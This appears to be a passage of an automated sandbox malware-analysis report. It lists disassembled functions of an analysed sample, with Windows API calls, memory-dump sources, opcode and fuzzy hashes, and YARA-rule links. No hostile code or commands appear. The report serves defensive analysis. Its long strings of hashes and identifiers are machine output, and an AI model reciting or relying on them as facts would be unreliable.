                                                                                                                                                                        • Instruction Fuzzy Hash: 38C10472D04315ABDB20BB64DC02ABEB7B9EF45768F254156F900EB291E7349E40F790
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F684BD Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00F684B8,?,?,00000008,?,?,00F714E4,00000000), ref: 00F686EA
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ExceptionRaise
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3997070919-0
                                                                                                                                                                        • Opcode ID: 98bd787caaf085d8fe6267909a8f736e51c590cbb9e50626d0480eb58a7612e9
                                                                                                                                                                        • Instruction ID: 78d70959cb836676fff4aaf59ca2ea08e170cb6210759ec69b343e691376a4a0
                                                                                                                                                                        • Opcode Fuzzy Hash: 98bd787caaf085d8fe6267909a8f736e51c590cbb9e50626d0480eb58a7612e9
                                                                                                                                                                        • Instruction Fuzzy Hash: 84B14D32610605DFDB14CF28C486B657BA0FF453A4F29865CE99ACF2A1CB35ED92DB40
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F535A9 Relevance: 1.6, APIs: 1, Instructions: 144COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00F535BF
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FeaturePresentProcessor
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2325560087-0
                                                                                                                                                                        • Opcode ID: 7b79e03c034e45ec1bba1a204a0f6e05ddf28e902affe2ca975e36635ddce23f
                                                                                                                                                                        • Instruction ID: 3de8e7afebb82ed71178099fdce8dc48af59ffd538feb4babfd9894ce093413f
                                                                                                                                                                        • Opcode Fuzzy Hash: 7b79e03c034e45ec1bba1a204a0f6e05ddf28e902affe2ca975e36635ddce23f
                                                                                                                                                                        • Instruction Fuzzy Hash: FF51A5B2D14219DBDB15CF98E885BB9B7F0FB08395F14842AC905E7350D374AA04EF90
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F6AF79 Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: f9a159c4ef85b6c8d4d8c602aecef94e7db36e7d823af915d6e34e51654e27e2
                                                                                                                                                                        • Instruction ID: 0d938f08757f25fbc07199b381e041334b5c4069d99cfdfea2bfbebb8f24287b
                                                                                                                                                                        • Opcode Fuzzy Hash: f9a159c4ef85b6c8d4d8c602aecef94e7db36e7d823af915d6e34e51654e27e2
                                                                                                                                                                        • Instruction Fuzzy Hash: BF31A67690021DBFCB20EFA9CC859BBBB7DEB85350F144159F915D7244EA31DD409BA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F5A587 Relevance: 1.6, Strings: 1, Instructions: 344COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: 0
                                                                                                                                                                        • API String ID: 0-4108050209
                                                                                                                                                                        • Opcode ID: bd384aa7c1d0e7ff51b99a16a97775445a99553e6d81fb55e2e232814f0b0a7d
                                                                                                                                                                        • Instruction ID: da276b193f99ae273066fcd6037e0bb62ba975c9ea5342d0e334d7ee4b4729be
                                                                                                                                                                        • Opcode Fuzzy Hash: bd384aa7c1d0e7ff51b99a16a97775445a99553e6d81fb55e2e232814f0b0a7d
                                                                                                                                                                        • Instruction Fuzzy Hash: D9C1C2709006468FCB24CF28C494A7EBBB1BF05322F184719DE5697291D734ED6EEB52
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F6E48A Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00F657CC: GetLastError.KERNEL32(?,00000008,00F6AD4C), ref: 00F657D0
                                                                                                                                                                          • Part of subcall function 00F657CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00F65872
                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00F6E4DE
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLast$InfoLocale
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3736152602-0
                                                                                                                                                                        • Opcode ID: d0f5d1fe97232f106c09e6d531da2e9b47e1835439e6b3c933215d3e0fedec95
                                                                                                                                                                        • Instruction ID: a958949e8646f068c7819cd6229c7a4ce1b5d1d4b308a7f39312b0ace3e6a7e3
                                                                                                                                                                        • Opcode Fuzzy Hash: d0f5d1fe97232f106c09e6d531da2e9b47e1835439e6b3c933215d3e0fedec95
                                                                                                                                                                        • Instruction Fuzzy Hash: F921C577A14206ABDB28AF25DC41ABA73ACEF04724F140079FD06D6141FB74DD05E750
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F6E111 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00F657CC: GetLastError.KERNEL32(?,00000008,00F6AD4C), ref: 00F657D0
                                                                                                                                                                          • Part of subcall function 00F657CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00F65872
                                                                                                                                                                        • EnumSystemLocalesW.KERNEL32(00F6E237,00000001,00000000,?,-00000050,?,00F6E868,00000000,?,?,?,00000055,?), ref: 00F6E183
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2417226690-0
                                                                                                                                                                        • Opcode ID: 9d8a0bff87e240db03cca5d82f9c7734f0c3b3d98d47f35b79758a5fdaf5d913
                                                                                                                                                                        • Instruction ID: 0725f266e5740cd23ed78a6e01089d939ee25f08ad0ee529f78133f39418f580
                                                                                                                                                                        • Opcode Fuzzy Hash: 9d8a0bff87e240db03cca5d82f9c7734f0c3b3d98d47f35b79758a5fdaf5d913
                                                                                                                                                                        • Instruction Fuzzy Hash: DD11293F6007059FDB189F38C8A15BAB792FF80729B15442DE54647A40D371B942EB40
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F6E6B9 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00F657CC: GetLastError.KERNEL32(?,00000008,00F6AD4C), ref: 00F657D0
                                                                                                                                                                          • Part of subcall function 00F657CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00F65872
                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00F6E453,00000000,00000000,?), ref: 00F6E6E5
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLast$InfoLocale
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3736152602-0
                                                                                                                                                                        • Opcode ID: 3c3fc30aa3c5cc7f520808129093d1307a7ed813101723cabb5eea06486d52a6
                                                                                                                                                                        • Instruction ID: f409b08327f107384aff5b889fb5fb38dfa1bfad7bcebb25f6a5104a109fd665
                                                                                                                                                                        • Opcode Fuzzy Hash: 3c3fc30aa3c5cc7f520808129093d1307a7ed813101723cabb5eea06486d52a6
                                                                                                                                                                        • Instruction Fuzzy Hash: 87F0CD3BE00216BFDB285B65CD09BFA7768EB40764F150434EC25A3180EA74FD41E690
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F6E1AC Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00F657CC: GetLastError.KERNEL32(?,00000008,00F6AD4C), ref: 00F657D0
                                                                                                                                                                          • Part of subcall function 00F657CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00F65872
                                                                                                                                                                        • EnumSystemLocalesW.KERNEL32(00F6E48A,00000001,?,?,-00000050,?,00F6E82C,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00F6E1F6
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2417226690-0
                                                                                                                                                                        • Opcode ID: 124c27885cbb933f6d0b6f07904401e5df9ea11c4c8116ef4825dd9ad3f0e001
                                                                                                                                                                        • Instruction ID: 565baff672d582cdd84a9d114cb362f309eb838ecf6fa59a3f6aba56e52de293
                                                                                                                                                                        • Opcode Fuzzy Hash: 124c27885cbb933f6d0b6f07904401e5df9ea11c4c8116ef4825dd9ad3f0e001
                                                                                                                                                                        • Instruction Fuzzy Hash: EDF0463B6003085FCB246F348C85A7A7BA5EF81B28F04442CF9058BA80C6B19C42EB50
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F67132 Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00F61C9A: EnterCriticalSection.KERNEL32(-00F8DE50,?,00F63576,?,00F8A078,0000000C,00F63841,?), ref: 00F61CA9
                                                                                                                                                                        • EnumSystemLocalesW.KERNEL32(00F67125,00000001,00F8A1D8,0000000C,00F67554,00000000), ref: 00F6716A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1272433827-0
                                                                                                                                                                        • Opcode ID: 1cc31c5de00269435824bb70e42b7305ae2be7675923531357c2cbe3ec41fb22
                                                                                                                                                                        • Instruction ID: 56841a6575aaa74c74a539b30b4963ddbf895556ee2bf8ff2c5af5ad54bf6ea4
                                                                                                                                                                        • Opcode Fuzzy Hash: 1cc31c5de00269435824bb70e42b7305ae2be7675923531357c2cbe3ec41fb22
                                                                                                                                                                        • Instruction Fuzzy Hash: BFF06D72A54304DFDB00EF98E846BAC7BF0FB49725F00456AF514DB2A0DB798940AF51
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F6E0C6 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00F657CC: GetLastError.KERNEL32(?,00000008,00F6AD4C), ref: 00F657D0
                                                                                                                                                                          • Part of subcall function 00F657CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00F65872
                                                                                                                                                                        • EnumSystemLocalesW.KERNEL32(00F6E01F,00000001,?,?,?,00F6E88A,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00F6E0FD
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2417226690-0
                                                                                                                                                                        • Opcode ID: 15af00a1e83d87e45ce5d82138f5d822c7ee3ae8958231daf486d2ecf762b566
                                                                                                                                                                        • Instruction ID: d3564c6e7a90e1cf378ff7dcd12896b555dcb7049e909a6de98a7235ef2985e5
                                                                                                                                                                        • Opcode Fuzzy Hash: 15af00a1e83d87e45ce5d82138f5d822c7ee3ae8958231daf486d2ecf762b566
                                                                                                                                                                        • Instruction Fuzzy Hash: 09F02B3F700309ABCB04AF35DC4566A7F95EFC1B60F06406CEA098F651C6B5D882EB90
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F523F8 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetLocaleInfoEx.KERNEL32(?,00000022,00000000,00000002,?,?,00F500E2,00000000,00000000,00000004,00F4ED14,00000000,00000004,00F4F127,00000000,00000000), ref: 00F52410
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InfoLocale
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2299586839-0
                                                                                                                                                                        • Opcode ID: 5ba443001a0ac2d42cf5b9ffd2681b2e74b2ea3121636da5328abaf04e374427
                                                                                                                                                                        • Instruction ID: 9c0e8601ae8129d8dc2c47885a8a416ae76def8581ab28156a3b743d35a307f3
                                                                                                                                                                        • Opcode Fuzzy Hash: 5ba443001a0ac2d42cf5b9ffd2681b2e74b2ea3121636da5328abaf04e374427
                                                                                                                                                                        • Instruction Fuzzy Hash: DAE0D832A54104BAD755DBB89E0FFBA7698E70271BF504251EE02D40D2DBA1CA44B161
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F676AF Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00F64E3F,?,20001004,00000000,00000002,?,?,00F64441), ref: 00F676E3
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InfoLocale
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2299586839-0
                                                                                                                                                                        • Opcode ID: 1d3d8ac90d032a073557c3c499d326061425b30c9a4732bc9df638043160e278
                                                                                                                                                                        • Instruction ID: fa076f4e7b6642d4c5ef8aa99a6246f8958daf76d1a1181ef8979bf2e79e24d3
                                                                                                                                                                        • Opcode Fuzzy Hash: 1d3d8ac90d032a073557c3c499d326061425b30c9a4732bc9df638043160e278
                                                                                                                                                                        • Instruction Fuzzy Hash: 8CE01A3250871CBBCB123F61DC08AAE7A26AF44764F104020FC05661218B768960BB96
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F5353F Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_0002354B,00F53077), ref: 00F53544
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3192549508-0
                                                                                                                                                                        • Opcode ID: 33d7c7315265152b31a92f2edc54996a9b8a9848681d2394080f0b37e6e181cf
                                                                                                                                                                        • Instruction ID: da9ef283c558d65ddf61a4fbe9c234be2727f83e79a584af42823740d934047a
                                                                                                                                                                        • Opcode Fuzzy Hash: 33d7c7315265152b31a92f2edc54996a9b8a9848681d2394080f0b37e6e181cf
                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F32310 Relevance: 1.3, APIs: 1, Instructions: 64memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00F52C98: EnterCriticalSection.KERNEL32(00F8DD3C,?,?,?,00F323B6,00F8E638,72A902E8,?,?,00F73D6D,000000FF), ref: 00F52CA3
                                                                                                                                                                          • Part of subcall function 00F52C98: LeaveCriticalSection.KERNEL32(00F8DD3C,?,?,?,00F323B6,00F8E638,72A902E8,?,?,00F73D6D,000000FF), ref: 00F52CE0
                                                                                                                                                                        • GetProcessHeap.KERNEL32 ref: 00F32365
                                                                                                                                                                          • Part of subcall function 00F52C4E: EnterCriticalSection.KERNEL32(00F8DD3C,?,?,00F32427,00F8E638,00F76B40), ref: 00F52C58
                                                                                                                                                                          • Part of subcall function 00F52C4E: LeaveCriticalSection.KERNEL32(00F8DD3C,?,?,00F32427,00F8E638,00F76B40), ref: 00F52C8B
                                                                                                                                                                          • Part of subcall function 00F52C4E: RtlWakeAllConditionVariable.NTDLL ref: 00F52D02
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CriticalSection$EnterLeave$ConditionHeapProcessVariableWake
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 325507722-0
                                                                                                                                                                        • Opcode ID: 0f4a5755ceda792a179dba776555fea6a576d226ade611dadbb51f4a51d1e04f
                                                                                                                                                                        • Instruction ID: 0175c21f1521afc46fef7a891b76c4d6c3851a247717a518ba1c700a50ee0129
                                                                                                                                                                        • Opcode Fuzzy Hash: 0f4a5755ceda792a179dba776555fea6a576d226ade611dadbb51f4a51d1e04f
                                                                                                                                                                        • Instruction Fuzzy Hash: AD219CB0921608DBD350EF58EC05BE977B0EB36324F004319E825972E1F3756808BB52
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F60A48 Relevance: .7, Instructions: 655COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
